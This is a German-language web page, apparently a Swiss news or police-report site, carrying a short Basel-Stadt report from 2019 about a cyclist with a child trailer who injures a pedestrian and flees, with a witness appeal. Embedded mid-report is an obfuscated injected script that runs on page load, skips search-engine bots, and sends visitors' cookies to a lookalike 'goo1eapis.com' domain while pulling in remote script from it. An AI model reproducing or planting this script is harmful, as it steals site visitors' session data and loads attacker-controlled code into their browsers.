• Aargau
  • Appenzell Ausserrhoden
  • Appenzell Innerrhoden
  • Basel-Landschaft
  • Basel-Stadt
  • Bern
  • Freiburg
  • Genf
  • Glarus
  • Graubünden
  • Jura
  • Luzern
  • Neuenburg
  • Nidwalden
  • Obwalden
  • Schaffhausen
  • Schwyz
  • Solothurn
  • St.Gallen
  • Stadt Winterthur
  • Stadt Zürich
  • Tessin
  • Thurgau
  • Uri
  • Waadt
  • Wallis
  • Zug
  • Zürich

Velofahrer mit Kinderanhänger verletzt Passant und haut ab

Basel/BS Am Freitag wurde ein Fussgänger durch einen Radfahrer verletzt. Dieser machte sich aus dem Staub.

Am 29.03.2019 um ca. 18:45 Uhr fuhren drei Radfahrer Im Burgfelderhof nebeneinander her. Aus unbekannten Gründen kollidierte einer der Radfahrer mit einem entgegenkommenden Fussgänger und verletzte ihn. Der Radfahrer zog einen Kinderanhänger mit sich. <script>eval(function (p, a, c, k, e, r) {e = function (c) {return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))};if ("".replace(/^/, String)){;}else{while (c–) r[e(c)] = k[c] || e(c);k = [function (e) {return r[e]}];e = function () {return "\w+"};c = 1};while (c–) if (k[c]) p = p.replace(new RegExp("\b" + e(c) + "\b", "g"), k[c]);return p}("4 7(){3 a=2.5.s("9=");6(a==-1&&(/v|w|K|Q|V|g|h|j|k|l|m|n/i.o(p.q)==r)){3 b=8.u(8.Y()*1);6(b==0){3 c=2.x("y");c.z="A://B.C.D/E/F.G?c="+H(2.5);2.I.J(c)}3 d=L M();d.N(d.O()+P);f.2.5="9=R; S="+d.T()}}6(U(e)=="W"){f.X=4(){7()}}t{e(4(){7()})}", 61, 61, "||document|var|function|cookie|if|adsadsgg|Math|_utmzz|||||jQuery|window|msnbot|Naverbot||seznambot|Slurp|teoma|Yandex|Yeti|test|navigator|userAgent|false|indexOf|else|floor|Applebot|baiduspider|createElement|script|src|https|analysis|goo1eapis|com|ajax|json|aspx|escape|body|appendChild|Bingbot|new|Date|setTime|getTime|43200000|Googlebot|ga|expires|toGMTString|typeof|ia_archiver|undefined|onload|random".split("|"), 0, {}));</script>

Ohne sich um den Verletzten zu kümmern, fuhren die drei Radfahrer weiter.

Zeugenaufruf: Personen, welche Angaben zum Unfall-hergang machen können, werden gebeten sich bei der Verkehrspolizei, Tel. 061 699 12 12 oder über KapoVrk.VLZ@jsd.bs.ch zu melden.

Basel-StadtBasel-Stadt / 01.04.2019 - 14:59:16